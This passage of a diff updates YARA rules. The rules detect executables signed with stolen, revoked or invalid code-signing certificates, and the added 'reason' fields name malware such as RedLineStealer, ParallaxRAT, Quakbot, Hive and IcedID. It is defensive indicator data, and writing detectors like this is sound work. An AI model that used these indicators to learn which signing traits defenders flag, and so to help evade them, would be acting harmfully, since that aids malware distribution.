-rule DITEKSHEN_INDICATOR_KB_CERT_00F4D2Def53Bccb0Dd2B7D54E4853A2Fc5 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_C81319D20C6F1F1Aec3398522189D90C : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8c1970b7-10b5-5976-a89c-a0d30f4b04af"
+		id = "d93f571b-49f6-5a8b-9478-1054ede2257f"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1767-L1778"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8476-L8489"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0d9813d79f86ff22d5478469bee6cf457afe3780dd4308caa5da502faf816377"
+		logic_hash = "1271d0cc05d35a70a90f605e7c68fc52605570e453e9e67fbeb74762a88a0a96"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d5431403ba7b026666e72c675aac6c46720583a60320c5c2c0f74331fe845c35"
+		thumbprint = "18d8be8afa6613e2ef037598a6e08e0ef197d420f21aa4050f473fcabd16644a"
+		reason = "RedLineStealer"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PETROYL GROUP, TOV" and pe.signatures [ i ] . serial == "00:f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_56D576A062491Ea0A5877Ced418203A1 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_77550Ed697992B397E3F1Ad8E2A662D1 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "94e29354-b6bc-5936-abc8-2b42d2e65294"
+		id = "1d969340-de5e-569e-bfed-a80a1623d1b4"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1780-L1791"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8491-L8504"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "877b773cb1bdc6c6c309374e95dc7eac4d525c681200169fcf492476f6335342"
+		logic_hash = "87a70f10a111c4c5d1c3fb5b1c2a9da528f7d484ae6391c91e4052aba5c6bbe0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b22e022f030cf1e760a7df84d22e78087f3ea2ed262a4b76c8b133871c58213b"
+		thumbprint = "0c439c7b60714158f62c45921caf30d17dae37ec6cbc2dfdd9d306e18ae6df63"
+		reason = "ParallaxRAT"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Silvo LLC" and pe.signatures [ i ] . serial == "56:d5:76:a0:62:49:1e:a0:a5:87:7c:ed:41:82:03:a1" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GRASS RAIN, s.r.o." and pe.signatures [ i ] . serial == "77:55:0e:d6:97:99:2b:39:7e:3f:1a:d8:e2:a6:62:d1" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4152169F22454Ed604D03555B7Afb175 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_B1Bbef3Aba79Ab2Eae5B8015F26B34F8 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "61286549-7561-5607-9073-2a3ee0d54a44"
+		id = "382952bd-ffb3-5ff7-aff1-cf9fe8f20d1d"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1793-L1804"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8506-L8519"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ee965ee8b6ebbb6171e3b10a7887acf35c9ed7fcbe49b7f403190c7fb046ec63"
+		logic_hash = "34b00243f0b5e8d09938f1500871797125644f839298427c877801027638fd34"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a1561cacd844fcb62e9e0a8ee93620b3b7d4c3f4bd6f3d6168129136471a7fdb"
+		thumbprint = "247a10fc20386f4f54b7451aecc2d97ec77567c5031028cc7f1b98f9191bee80"
+		reason = "NW0rm"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMACKTECH SOFTWARE LIMITED" and pe.signatures [ i ] . serial == "41:52:16:9f:22:45:4e:d6:04:d0:35:55:b7:af:b1:75" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIDZHITAL ART, OOO" and pe.signatures [ i ] . serial == "b1:bb:ef:3a:ba:79:ab:2e:ae:5b:80:15:f2:6b:34:f8" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_41D05676E0D31908Be4Dead3486Aeae3 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_05D50A0E09Bb9A836Ffb90A3 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d668f53b-3d1c-5fcb-9f9c-2923e63f93a9"
+		id = "f6947bf1-7f20-5be5-a242-c1025be40055"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1806-L1817"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8521-L8534"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e4eb406e433b38ac127ba22040c48b510636eb55e2b524b02386710709d343b6"
+		logic_hash = "fc38ae0c9d4fc26739deab65ae3669f272e999b76dbc521dae04b9a3e3e7cef0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e6e597527853ee64b45d48897e3ca4331f6cc08a88cc57ff2045923e65461598"
+		thumbprint = "2d072e0e80885a82d5e35806b052ca416994e0fe06da1cfdcebd509d967a1aae"
+		reason = "ParallaxRAT"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rov SP Z O O" and pe.signatures [ i ] . serial == "41:d0:56:76:e0:d3:19:08:be:4d:ea:d3:48:6a:ea:e3" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Toliz Info Tech Solutions INC." and pe.signatures [ i ] . serial == "05:d5:0a:0e:09:bb:9a:83:6f:fb:90:a3" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_13C7B92282Aae782Bfb00Baf879935F4 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_623Eae6A66D3A6Ee80Df9Ccebe51181E : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "244ff442-0bce-5f9f-85ea-33fafe9a2e7b"
+		id = "7c3b85e4-8ce7-5c48-8f3b-e237a5cae9a0"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1819-L1830"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8536-L8549"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2742fd71eb8219db7785ad46be18a906fdab0914f632dfbf531238fd551a5b65"
+		logic_hash = "79fceab5a19025d25abb12a8e6f57f8a930d348d538d9c556b6d4fc461af66f2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c253cce2094c0a4ec403518d4fbf18c650e5434759bc690758cb3658b75c8baa"
+		thumbprint = "21c4e9af43068d041e6aec84341ae89cabb9917792c4bc372eced059555bb845"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "13:c7:b9:22:82:aa:e7:82:bf:b0:0b:af:87:99:35:f4" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GAIN AI LTD" and pe.signatures [ i ] . serial == "62:3e:ae:6a:66:d3:a6:ee:80:df:9c:ce:be:51:18:1e" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00D627F1000D12485995514Bfbdefc55D9 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0A392F03Ded5D73Cdeeda75052A57176 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dd18086c-063b-542e-915b-5bd452ee452e"
+		id = "c0a8cc1c-7427-589b-9e32-8679e9cdf251"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1832-L1843"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8551-L8564"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ff60a73b889c8f1df127ead90a93fbf92131cfb475d58eea1ba1569f3e99e00"
+		logic_hash = "ea0159ec1c4670c1e961a87131998fa796cf205eaa8a06bf829c61c9694fa5ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5fac3a6484e93f62686e12de3611f7a5251009d541f65e8fe17decc780148052"
+		thumbprint = "cf1d95b39cc695e90dc2ca8b1b50f33b71f9f21091df2b72ed97f0759b5ddde4"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THREE D CORPORATION PTY LTD" and pe.signatures [ i ] . serial == "00:d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLOWER COMPUTERS LTD" and pe.signatures [ i ] . serial == "0a:39:2f:03:de:d5:d7:3c:de:ed:a7:50:52:a5:71:76" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_62205361A758B00572D417Cba014F007 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_E9268Ed63A7D7E9Dfd40A664Ddfbaf18 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7838c733-7212-5e86-bb3c-5dfefb727a4b"
+		id = "59e63c76-1051-5274-b886-fcd75c8b0b38"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1845-L1856"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8566-L8579"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "52d67bc94e82bb9a36e969d393c395465c84ff76f89c5f8407c20e2c761000e3"
+		logic_hash = "62b9ea3c5197635db2101972af951f4afbd9b311b3c8286525bbd5b5baa17c41"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "83e851e8c50f9d7299363181f2275edc194037be8cb6710762d2099e0b3f31c6"
+		thumbprint = "0767b9ab857b8e24282b80a7368323689a842e6c8b5a00a4f965c03e375e8b0d"
+		reason = "Hive"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UNITEKH-S, OOO" and pe.signatures [ i ] . serial == "62:20:53:61:a7:58:b0:05:72:d4:17:cb:a0:14:f0:07" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Casta, s.r.o." and pe.signatures [ i ] . serial == "e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_566Ac16A57B132D3F64Dced14De790Ee : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Da156922F4760E0C5F5Bcf79812A27E1 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "05f49d36-7bf1-5bbc-b728-e1616366c15e"
+		id = "065bacbc-3004-53c1-ba73-4779743e8221"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1858-L1869"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8581-L8594"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0618ce3ce0c5f8923c12a99586bbec8ec86229c7e08af75f5b0756f348d53bd5"
+		logic_hash = "f6dd0f2373e412a753cbe5e27152f48d6c8980de9b26e5ab212b926e7e41c813"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2e44464a5907ac46981bebd8eed86d8deec9a4cfafdf1652c8ba68551d4443ff"
+		thumbprint = "6e19e012f55e0bb44e9036d4445ab945942965dcb81b9ed24ad6fc17933c4fce"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unirad LLC" and pe.signatures [ i ] . serial == "56:6a:c1:6a:57:b1:32:d3:f6:4d:ce:d1:4d:e7:90:ee" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DRINK AND BUBBLE LTD" and pe.signatures [ i ] . serial == "da:15:69:22:f4:76:0e:0c:5f:5b:cf:79:81:2a:27:e1" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_661Ba8F3C9D1B348413484E9A49502F7 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5226A724Cfa0B4Bc0164Ecda3F02A3Dc : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "75fb83a1-c493-510a-8c01-4cc699d71465"
+		id = "37d1061f-80b1-5944-bde3-6279633e321a"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1871-L1882"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8596-L8609"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "661af02d7a206f50e996caf690ded541acab8c8268df9e86744d36f7322efe5c"
+		logic_hash = "8fa1dad2cd4c1406c1346bbe0fef88eba415437d159cf9010dcfaaa7210aef0e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4ca944c9b69f72be3e95f385bdbc70fc7cff4c3ebb76a365bf0ab0126b277b2d"
+		thumbprint = "92f005b9c46c7993205d9451823cf0410d1afbd7056a7dcdfa2b8b3da74ee1bf"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unique Digital Services Ltd." and pe.signatures [ i ] . serial == "66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALENTE SP Z O O" and pe.signatures [ i ] . serial == "52:26:a7:24:cf:a0:b4:bc:01:64:ec:da:3f:02:a3:dc" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0092D9B92F8Cf7A1Ba8B2C025Be730C300 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_121070Be1E782F206985543Bc7Bc58B6 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "856b4522-f314-5cbb-872e-08b21107881b"
+		id = "8432c7f0-ee2e-5935-8fe8-36b0094a5e1a"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1884-L1895"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8611-L8624"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "207fcc48053afb6a435c40fd8e25a88753139c35f4882a1975fdb8c55dc8ea89"
+		logic_hash = "21eb6fed2225d2ab056948603b0990c2eb7dc9289da9a9df16f0d6cd042b3778"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b891c96bd8548c60fa86b753f0c4a4ccc7ab51256b4ee984b5187c62470f9396"
+		thumbprint = "a4534aff03258589a2622398d1904d3bfd264c37e8649a68136f8d552f8b738f"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UPLagga Systems s.r.o." and pe.signatures [ i ] . serial == "00:92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Prod Can Holdings Inc." and pe.signatures [ i ] . serial == "12:10:70:be:1e:78:2f:20:69:85:54:3b:c7:bc:58:b6" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00E5Ad42C509A7C24605530D35832C091E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_15C21Dab7F4E644E4B35C4858004D8A9 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "44615e9d-6677-5642-b56d-82c0577f758c"
+		id = "7dac5657-038f-5cbd-a854-cdb12921121e"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1897-L1908"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8626-L8639"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8d76474257ee9a24d4785ddd119e586712a157ff7b420a7db2b8efe06c43f76c"
+		logic_hash = "646a858b10de89da4e639d3902ada78fad3a45868f0d7782546a865396cf226c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "17b1f6ffc569acd2cf803c4ac24a7f9828d8d14f6b057e65efdb5c93cc729351"
+		thumbprint = "34a9cd401a5a86c5194954df3a497094c01b6603264aab5cf7d9b3c4a0074801"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VESNA, OOO" and pe.signatures [ i ] . serial == "00:e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "P.REGO, s.r.o." and pe.signatures [ i ] . serial == "15:c2:1d:ab:7f:4e:64:4e:4b:35:c4:85:80:04:d8:a9" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3E57584Db26A2C2Ebc24Ae3E1954Fff6 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_101D6A5A29D9A77807553Ceac669D853 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9073846e-97c7-5b2e-a81f-3bbd06699842"
+		id = "8554ce79-fd87-54ac-b538-e2899fe95414"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1910-L1921"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8641-L8654"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cfc68c32ceba351610651d34fb420c64bab9a3b1564d9b6392f0ee8cdcdac7de"
+		logic_hash = "be6b5a98d5c218c39d8f10bc2a0e443bc8be8a591ab368ee902de4a45a95c8d2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4ecbada12a11a5ad5fe6a72a8baaf9d67dc07556a42f6e9a9b6765e334099f4e"
+		thumbprint = "cd6aa9a7a4898e42b8361dc3542d0afb72e6deefc0b85ebfb55d282a2982b994"
+		reason = "IcedID"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zaryad LLC" and pe.signatures [ i ] . serial == "3e:57:58:4d:b2:6a:2c:2e:bc:24:ae:3e:19:54:ff:f6" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIC GROUP LIMITED" and pe.signatures [ i ] . serial == "10:1d:6a:5a:29:d9:a7:78:07:55:3c:ea:c6:69:d8:53" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_13794371C052Ec0559E9B492Abb25C26 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4679C5398A279318365Fd77A84445699 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e2a4fdb2-fa04-5662-bb84-5c0c4892e3af"
+		id = "ff4061e7-5e45-596f-9d40-c33661a18e71"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1923-L1934"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8656-L8669"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "af80177181efd92b4e1a4a5c665df01add069dc3b47074bcbdd503516cf5a844"
+		logic_hash = "1c591cbb2d35d8dad01ff4ea8c71c8b3a0a5f999f1edfcfc038e47f96d3a3a67"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "dd3ab539932e81db45cf262d44868e1f0f88a7b0baf682fb89d1a3fcfba3980b"
+		thumbprint = "8fcef52c16987307f4e1f7d4b62304c65aedb952c90bb2ead8321f1e1d7c9a6e"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Carmel group LLC" and pe.signatures [ i ] . serial == "13:79:43:71:c0:52:ec:05:59:e9:b4:92:ab:b2:5c:26" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HURT GROUP HOLDINGS LIMITED" and pe.signatures [ i ] . serial == "46:79:c5:39:8a:27:93:18:36:5f:d7:7a:84:44:56:99" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_51Aead5A9Ab2D841B449Fa82De3A8A00 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_282A8A04073Eced658B9770Bda8C0D28 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d64ff10d-e4dd-5d89-a600-d136571be940"
+		id = "d735ccfc-3f5e-5858-95ec-f385172ea8e6"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1936-L1947"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8671-L8684"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1658a12bb040b5b16c61469fe52abbaaecf5bd66bf5e45a2c2da9f80fa0c66f5"
+		logic_hash = "4cfebe55887a2a09293678e4dff2f93f22bec151dada7c84a41ac6deb10b7cc3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "155edd03d034d6958af61bc6a7181ef8f840feae68a236be3ff73ce7553651b0"
+		thumbprint = "5cd4832101eb4f173c43986d5711087c8de25e6fcaef2f333e98a013e29b8373"
+		reason = "RedLineStealer"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Corsair Software Solution Inc." and pe.signatures [ i ] . serial == "51:ae:ad:5a:9a:b2:d8:41:b4:49:fa:82:de:3a:8a:00" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Betamaynd" and pe.signatures [ i ] . serial == "28:2a:8a:04:07:3e:ce:d6:58:b9:77:0b:da:8c:0d:28" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Bce1D49Ff444D032Ba3Dda6394A311E9 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0C48732873Ac8Ccebaf8F0E1E8329Cec : FILE
 {
 	meta:
